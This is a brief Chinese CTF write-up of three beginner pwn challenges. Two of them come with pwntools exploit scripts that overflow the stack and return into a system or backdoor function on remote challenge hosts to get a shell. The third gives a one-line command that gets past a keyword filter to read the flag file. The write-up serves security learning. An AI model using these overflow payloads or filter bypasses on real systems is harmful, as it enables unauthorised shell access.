[NUSTCTF 2022 新生赛]ezPwn
发现是64位文件
main函数里直接有system,并且这里涉及了栈溢出
exp:
from pwn import *
context(os='linux',arch='amd64',log_level='debug')
io = remote('node5.anna.nssctf.cn','25580')
padding = b'a'*(0xa+0x8)
system = 0x401229
payload = padding + p64(system)
io.sendline(payload)
io.interactive()
得到flag
[FSCTF 2023]nc
一道签到题用:
tac f\lag >&2
即可
[MoeCTF 2022]ret2text
发现是64位文件
看到了read典型栈溢出
发现有system和binsh
exp:
from pwn import *
context(os='linux',arch='amd64',log_level='debug')
io = remote('node5.anna.nssctf.cn','20864')
door = 0x4014c2
padding = b'a'*(0x40+0x8)
io.recvuntil(b'wish:')
payload = padding + p64(door)
io.sendline(payload)
io.interactive()